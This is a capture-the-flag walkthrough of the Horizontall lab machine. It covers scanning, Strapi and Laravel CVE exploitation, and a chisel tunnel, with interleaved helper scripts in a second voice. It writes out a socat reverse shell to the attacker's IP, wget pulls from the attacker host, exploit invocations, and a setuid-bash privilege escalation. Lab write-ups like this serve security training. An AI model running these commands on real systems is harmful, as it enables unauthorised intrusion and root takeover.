Nmap and Exploit Guide for Horizontall

The document details a penetration testing process on a server with the IP 10.10.11.105, highlighting the use of tools like Masscan and Nmap to identify open ports and services. It describes exploiting vulnerabilities in Strapi and Laravel to gain unauthorized access and retrieve user and root flags. The process involves adding subdomains to the hosts file, using specific exploits, and setting up a reverse shell for further access.

Uploaded by Niero

Horizontall - 13th Nov 2021

[Link]

Scanning
We can run masscan_to_nmap.py, a tool I wrote that you can find on my Github. It runs Masscan, collects the open ports, and hands them to Nmap for a version and default-script scan (-sV -sC) against just those ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to [Link]

The http-title line shows that the site redirects to [Link], so add that hostname for 10.10.11.105 to /etc/hosts so the redirect resolves.
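The same Masscan-to-Nmap hand-off as a POSIX shell script, added here as an example (it is not the author's masscan_to_nmap.py, which this page does not reproduce). It reads Masscan's list output (-oL), dedupes the open TCP ports and prints the follow-up nmap command so it can be checked before it goes out; the Masscan output lines are constructed and neither scanner is actually run.

```shell
#!/bin/sh
# masscan -> nmap hand-off. Added example, not the author's masscan_to_nmap.py.
# Assumes masscan list output (-oL), produced by something like:
#   masscan -p1-65535 --rate 1000 10.10.11.105 -oL masscan.lst
# whose open-port lines look like "open tcp 22 10.10.11.105 1636752000".

# Print the open TCP ports from a masscan -oL file, sorted and comma-separated.
masscan_open_ports() {
    awk '$1 == "open" && $2 == "tcp" { print $3 }' "$1" | sort -n -u | paste -s -d , -
}

# Build (but do not run) the nmap version + default-script scan for those ports,
# so the command can be eyeballed before it is fired at the target.
nmap_followup_cmd() {
    target="$1"; ports="$2"
    printf 'nmap -sV -sC -p %s -oA nmap/%s %s\n' "$ports" "$target" "$target"
}

# Constructed sample of masscan output for the write-up's target (a duplicate and
# an out-of-order line included on purpose).
sample="$(mktemp)"
cat > "$sample" <<'EOF'
#masscan
open tcp 80 10.10.11.105 1636752001
open tcp 22 10.10.11.105 1636752000
open tcp 80 10.10.11.105 1636752002
# end
EOF

ports="$(masscan_open_ports "$sample")"   # 22,80
nmap_followup_cmd 10.10.11.105 "$ports"   # nmap -sV -sC -p 22,80 -oA nmap/10.10.11.105 10.10.11.105
rm -f "$sample"
```

Masscan at a high rate can miss ports on a lossy link, so when the Nmap result looks thin it is worth a second Masscan pass at a lower --rate before concluding a port is closed.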

Enumeration
The OpenSSH on port 22 offers no obvious way in and I don't want to brute force anything, so let's give our attention to the website on port 80.

This is a pretty plain site with no interesting functionality. However, digging into the page source, we can see a subdomain called '[Link]' is referenced. Let's add this to our /etc/hosts file too, as a second hostname for the same IP: nginx picks the virtual host from the Host header, so without the entry we never reach that site.
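Both hosts-file steps so far (the redirect target and the subdomain found in the source) are the same manual routine, so here it is scripted as an added example that is not part of the write-up: one function pulls every hostname under a base domain out of saved page source, the other appends a hosts entry only if that name is not already mapped. The base domain target.htb and the page fragment are constructed stand-ins; the hosts file is a temp file in the demo, and the third argument defaults to /etc/hosts for real use.

```shell
#!/bin/sh
# Pull hostnames out of saved page source and add them to a hosts file.
# Added example, not from the write-up. The base domain target.htb and the
# page fragment below are constructed stand-ins for the real ones.

# Print every hostname under $2 found in the file $1 (HTML, JS, CSS...), lowercased
# and deduplicated. Dots in the domain are escaped so they match literally.
extract_vhosts() {
    esc="$(printf '%s' "$2" | sed 's/\./\\./g')"
    grep -oiE "([A-Za-z0-9-]+\.)*${esc}" "$1" | tr 'A-Z' 'a-z' | sort -u
}

# Append "$1 $2" to the hosts file $3 (default /etc/hosts) unless $2 is already
# mapped there, so re-running the step never leaves duplicate lines behind.
add_hosts_entry() {
    ip="$1"; host="$2"; file="${3:-/etc/hosts}"
    if [ -f "$file" ] && awk -v h="$host" '
            $1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == h) found = 1 }
            END { exit !found }' "$file"; then
        echo "$host already in $file" >&2
        return 0
    fi
    printf '%s\t%s\n' "$ip" "$host" >> "$file"
}

# Constructed page source: a redirect target plus a subdomain buried in a script tag.
page="$(mktemp)"; hosts="$(mktemp)"
cat > "$page" <<'EOF'
<meta http-equiv="refresh" content="0; url=http://TARGET.htb/">
<script src="http://api-prod.target.htb/reviews"></script>
<a href="https://target.htb/about">about</a>
EOF

for h in $(extract_vhosts "$page" target.htb); do   # api-prod.target.htb, target.htb
    add_hosts_entry 10.10.11.105 "$h" "$hosts"
done
cat "$hosts"
rm -f "$page" "$hosts"
```

Run extract_vhosts over the JavaScript bundles as well as the HTML; the API hostname on this box sits in a script, which is exactly where a browser's "view source" habit tends to miss it.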

Api-Prod
If we browse to this subdomain and the referenced path, we are met with an uninspiring page.

However, browsing to /admin turns up something far more interesting: a Strapi admin login.

Strapi
Running searchsploit against Strapi shows three exploits we can test.

Let's copy the exploit locally and fire it off:


# pull exploit
searchsploit -m multiple/webapps/[Link]
# fire exploit
python3 [Link] [Link]

The exploit resets the admin password, leaving us with the credentials admin : SuperStrongPassword1, which let us sign in.

Authorized
Now that we have credentials, we can examine Strapi in more detail. We know from the exploit that we are most likely running version 3.0.0-beta.17.4, which we can verify at the bottom left of the admin portal.
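Before firing a version-specific exploit it is worth reading the version off the target rather than inferring it from what an exploit happened to work against. The following is an added example, not the write-up's exploit or Strapi's own code: it assumes the Strapi 3 beta admin panel's /admin/init endpoint returns JSON with a strapiVersion field (the response below is constructed), and it compares that version against the versions the CVE descriptions name as fixed (3.0.0-beta.17.5 for CVE-2019-18818, the unauthenticated password reset the searchsploit exploit relied on, and 3.0.0-beta.17.8 for CVE-2019-19609).

```shell
#!/bin/sh
# Confirm the Strapi version before firing version-specific exploits.
# Added example, not from the write-up or the Strapi project. Assumes the admin
# panel's /admin/init endpoint (which the Strapi 3 beta UI fetches on load)
# returns JSON containing "strapiVersion". Fixed versions are taken from the
# CVE descriptions: CVE-2019-18818 fixed in 3.0.0-beta.17.5, CVE-2019-19609 in
# 3.0.0-beta.17.8.

# Extract the version string from the /admin/init JSON body on stdin.
strapi_version_from_init() {
    sed -n 's/.*"strapiVersion":"\([^"]*\)".*/\1/p'
}

# Fetch it from a live target (not exercised offline): strapi_version http://api-prod.example
strapi_version() {
    curl -s -m 10 "$1/admin/init" | strapi_version_from_init
}

# beta_lt A B: succeed if A sorts before B within the 3.0.0-beta.X.Y line, comparing
# the numeric components after "beta." (so 17.4 < 17.8 and 17.4 < 17.10).
beta_lt() {
    a="${1#3.0.0-beta.}"; b="${2#3.0.0-beta.}"
    awk -v a="$a" -v b="$b" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, "."); n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0; yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# List the CVEs from this write-up that apply to a given 3.0.0-beta version.
strapi_known_vulns() {
    case "$1" in 3.0.0-beta.*) ;; *) echo "unhandled version: $1" >&2; return 2 ;; esac
    beta_lt "$1" 3.0.0-beta.17.5 && echo "CVE-2019-18818 unauthenticated admin password reset"
    beta_lt "$1" 3.0.0-beta.17.8 && echo "CVE-2019-19609 authenticated RCE via plugin install"
    return 0
}

# Constructed /admin/init response, as the target in the write-up would return it.
init_json='{"data":{"uuid":"constructed","currentEnvironment":"development","strapiVersion":"3.0.0-beta.17.4"}}'
v="$(printf '%s' "$init_json" | strapi_version_from_init)"   # 3.0.0-beta.17.4
strapi_known_vulns "$v"
```

The comparison is deliberately limited to the 3.0.0-beta.X.Y line; anything else is reported as unhandled rather than guessed at, since a wrong "vulnerable" verdict here costs a noisy failed exploit attempt against the target.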
A strategic google with that version turns up a post-authentication RCE in the admin panel's plugin install feature, CVE-2019-19609.
Let's pull the exploit and fire it off; it needs the admin JWT from the login we just did, plus a listener for the shell:
python3 [Link] \
  -d '[Link]' \
  -jwt '<admin JWT>' \
  -l <your ip> \
  -p <listening port>

Strapi Shell
uname -m confirms we're on a 64-bit machine, so I'm going to bring a socat binary over to get a stable shell:
# pull a static socat binary
wget \
[Link]

# serve it from the attack machine, pull it from the victim
python3 -m http.server 80 # kali
wget [Link] # victim pulls
# make executable
chmod +x ./socat

# get a shell
# attacker: hand the local tty to the incoming connection
socat file:`tty`,raw,echo=0 tcp-listen:<your port>
# victim: connect back with a real pty and job control
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your ip>:<your port>

We can grab the user flag whilst we're here

Enumeration II
Looking around the box, there are several services listening only on localhost:
netstat -plunt

We can curl each of them in turn until we see Laravel running on port 8000: curl [Link]

Laravel
Further down the same curl output, the welcome page's footer gives the version being run: Laravel v8 (PHP v7.4.18)
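The two steps above (spotting loopback-only listeners in netstat -plunt, then reading the Laravel banner off the page one of them serves) as an added shell example that is not part of the write-up. The netstat lines and the HTML snippet are constructed; the real box's other local services are not shown on this page, so only port 8000 is taken from it.

```shell
#!/bin/sh
# Find loopback-only listeners in netstat -plunt output and read the Laravel
# banner off the page they serve. Added example, not from the write-up; the
# netstat lines and HTML below are constructed.

# Print "port program" for every TCP listener bound to a loopback address only.
local_only_listeners() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" {
        n = split($4, p, ":"); port = p[n]
        host = substr($4, 1, length($4) - length(port) - 1)
        if (host ~ /^127\./ || host == "::1") print port, $7
    }' "$1" | sort -n -u
}

# curl each local port in turn (not run offline): probe_local_ports listeners.txt
probe_local_ports() {
    local_only_listeners "$1" | while read -r port prog; do
        printf '%s (%s): ' "$port" "$prog"
        curl -s -m 5 -o /dev/null -w '%{http_code}\n' "http://127.0.0.1:$port/" || echo "no http"
    done
}

# Pull "Laravel vX (PHP vY)" out of the default welcome page, which prints both
# versions in its footer; output is "X Y".
laravel_banner() {
    sed -n 's/.*Laravel v\([0-9.]*\) (PHP v\([0-9.]*\)).*/\1 \2/p' "$1" | head -n 1
}

# Constructed netstat -plunt output: two loopback-only services plus the public ones.
ns="$(mktemp)"; page="$(mktemp)"
cat > "$ns" <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      1832/php
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1043/mysqld
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
EOF
printf '<div>Laravel v8 (PHP v7.4.18)</div>\n' > "$page"

local_only_listeners "$ns"   # 3306 1043/mysqld  then  8000 1832/php
laravel_banner "$page"       # 8 7.4.18
rm -f "$ns" "$page"
```

The PID/Program column is only filled in for processes you own unless netstat runs as root, so a "-" there is not a sign the port is unowned; ss -lntp behaves the same way.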

Searching on this version turns up CVE-2021-3129, an unauthenticated RCE through the Ignition debug page that Laravel exposes when it is left running with debug mode on.

Tunnel
To use the exploit from Kali we need to reach port 8000, which only listens on the victim's loopback, so we'll tunnel it with chisel. Copy a chisel binary over to the victim (the same http.server trick used for socat) and begin:
# I always change chisel's name
# in kali
sudo ./chisel server --port 5001 --reverse
# in victim: reverse-forward Kali's port 8000 to the victim's local port 8000
./chisel client [Link]:5001 R:8000:[Link]:8000

You can test it has worked by visiting [Link]:8000 from Kali; the Laravel welcome page should load.


Exploit
Okay, now let's fire this bad boy off from our Kali machine, with whoami as a harmless test command (Monolog/RCE1 names the phpggc gadget chain the exploit uses):

python3 [Link] [Link] Monolog/RCE1 whoami

If whoami comes back as root, the root flag can be read directly from here.

To get a root shell, try this:

# the whoami at the end is just to confirm it has worked
python3 [Link] [Link] Monolog/RCE1 \
'chmod +s /bin/bash && whoami'

# then in a victim shell (the socat one from earlier will do)
/bin/bash -p

Remember to chmod -s /bin/bash once you're done: a setuid bash is a standing privilege escalation for any local user on the box.
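The chmod above runs blind through the RCE, so before trusting bash -p it is worth confirming the setuid bit actually landed, and at the end of the engagement confirming it has been taken off again. These helpers are an added example, not part of the write-up; they are exercised on a temp file standing in for /bin/bash so they run as an unprivileged user.

```shell
#!/bin/sh
# Verify the setuid bit actually landed on the shell before relying on bash -p,
# and take it off again when done. Added example, not from the write-up; it is
# exercised on a temp file so it can run as an unprivileged user.

# Succeed if the file has the setuid bit (POSIX test -u).
is_setuid() { [ -u "$1" ]; }

# Symbolic mode string, e.g. -rwsr-xr-x when setuid is set on a 755 file.
perm_string() { ls -ld "$1" | cut -c1-10; }

# Only drop into a setuid shell if the bit is really there: a failed chmod
# would otherwise give a plain unprivileged bash with no hint why.
spawn_if_setuid() {
    if is_setuid "$1"; then
        "$1" -p            # -p keeps the effective UID instead of dropping it
    else
        echo "$1 is not setuid; re-run the chmod" >&2
        return 1
    fi
}

# Cleanup for the end of the engagement: put the mode back and prove it.
remove_setuid() { chmod u-s "$1" && ! is_setuid "$1"; }

# Demonstration on a constructed file standing in for /bin/bash.
f="$(mktemp)"
chmod 755 "$f"
is_setuid "$f" || echo "before:  $(perm_string "$f")"    # -rwxr-xr-x
chmod u+s "$f"                                           # what the exploit payload does
is_setuid "$f" && echo "after:   $(perm_string "$f")"    # -rwsr-xr-x
remove_setuid "$f" && echo "cleaned: $(perm_string "$f")"
rm -f "$f"
```

The exploit's chmod +s sets both the setuid and setgid bits (-rwsr-sr-x on a 755 binary), so the cleanup on the real box is chmod -s, not just u-s.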
